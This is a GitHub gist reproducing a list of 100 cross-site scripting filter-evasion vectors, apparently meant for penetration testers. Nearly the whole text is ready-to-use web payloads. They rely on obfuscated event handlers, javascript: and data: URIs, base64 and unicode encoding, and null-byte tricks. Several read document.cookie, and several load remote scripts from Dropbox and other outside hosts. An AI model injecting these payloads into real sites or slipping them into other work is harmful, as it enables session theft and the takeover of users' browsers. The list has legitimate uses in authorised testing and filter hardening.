Last active
February 14, 2016 21:35
-
-
Save tech-nova/528e98d5970509df5093 to your computer and use it in GitHub Desktop.
Crédit : http://www.isoc.my/profiles/blogs/pure-cross-site-scripting-xss-vectors-you-need-as-a-pen-tester
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1) <iframe %00 src="	javascript:prompt(1)	"%00> | |
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
3) <input/onmouseover="javaSCRIPT:confirm(1)" | |
4) <sVg><scRipt %00>alert(1) {Opera} | |
5) <img/src=`%00` onerror=this.onerror=confirm(1) | |
6) <form><isindex formaction="javascript:confirm(1)" | |
7) <img src=`%00`
 onerror=alert(1)
 | |
8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
12) "><h1/onmouseover='\u0061lert(1)'>%00 | |
13) <iframe/src="data:text/html,<svg onload=alert(1)>"> | |
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
18) <iframe src=javascript:alert(document.location)> | |
19) <form><a href="javascript:\u0061lert(1)">X | |
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
21) <img/	  src=`~` onerror=prompt(1)> | |
22) <form><iframe 	  src="javascript:alert(1)" 	;> | |
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
24) http://www.google<script .com>alert(document.location)</script | |
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
26) <img/src=@  onerror = prompt('1') | |
27) <style/onload=prompt('XSS') | |
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
30) �</form><input type="date" onfocus="alert(1)"> | |
31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
33) <iframe srcdoc='<body onload=prompt(1)>'> | |
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
35) <script ~~~>alert(0%0)</script ~~~> | |
36) <style/onload=<!--	> alert (1)> | |
37) <///style///><span %2F onmousemove='alert(1)'>SPAN | |
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
41) <marquee onstart='javascript:alert(1)'>^__^ | |
42) <div/style="width:expression(confirm(1))">X</div> {IE7} | |
43) <iframe/%00/ src=javaSCRIPT:alert(1) | |
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
48) <a/href="javascript: javascript:prompt(1)"><input type="X"> | |
49) </plaintext\></|\><plaintext/onmouseover=prompt(1) | |
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
51) <a href="javascript:\u0061le%72t(1)"><button> | |
52) <div onmouseover='alert(1)'>DIV</div> | |
53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
54) <a href="jAvAsCrIpT:alert(1)">X</a> | |
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
57) <var onmouseover="prompt(1)">On Mouse Over</var>58) <a href=javascript:alert(document.cookie)>Click Here</a> | |
59) <img src="/" =_=" title="onerror='prompt(1)'"> | |
60) <%<!--'%><script>alert(1);</script --> | |
61) <script src="data:text/javascript,alert(1)"></script> | |
62) <iframe/src \/\/onload = prompt(1) | |
63) <iframe/onreadystatechange=alert(1) | |
64) <svg/onload=alert(1) | |
65) <input value=<><iframe/src=javascript:confirm(1) | |
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
67) http://www.<script>alert(1)</script .com | |
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
69) <svg><script ?>alert(1) | |
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
71) <img src=`xx:xx`onerror=alert(1)> | |
72) <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" _origwidth="320" height="240" width="320"><param name="src" value="http://jsfiddle.net/XLE63/ "><embed wmode="opaque" type="application/x-shockwave-flash" src="http://jsfiddle.net/XLE63/" allowscriptaccess="never" _origwidth="320" height="240" width="320"> <param name="allowscriptaccess" value="never"><param name="wmode" value="opaque"></object> | |
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
74) <math><a xlink:href="//jsfiddle.net/t846h/">click | |
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
76) <svg contentScriptType=text/vbs><script>MsgBox+1 | |
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
82) <object data=javascript:\u0061le%72t(1)> | |
83) <script>+-+-1-+-+alert(1)</script> | |
84) <body/onload=<!-->
alert(1)> | |
85) <script itworksinallbrowsers>/*<script* */alert(1)</script | |
86) <img src ?itworksonchrome?\/onerror = alert(1) | |
87) <svg><script>//
confirm(1);</script </svg> | |
88) <svg><script onlypossibleinopera:-)> alert(1) | |
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
90) <script x> alert(1) </script 1=2 | |
91) <div/onmouseover='alert(1)'> style="x:"> | |
92) <--`<img/src=` onerror=alert(1)> --!> | |
93) <script/src=data:text/javascript,alert(1)></script> | |
94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
95) "><img src=x onerror=window.open('https://www.google.com/');> | |
96) <form><button formaction=javascript:alert(1)>CLICKME | |
97) <math><a xlink:href="//jsfiddle.net/t846h/">click | |
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment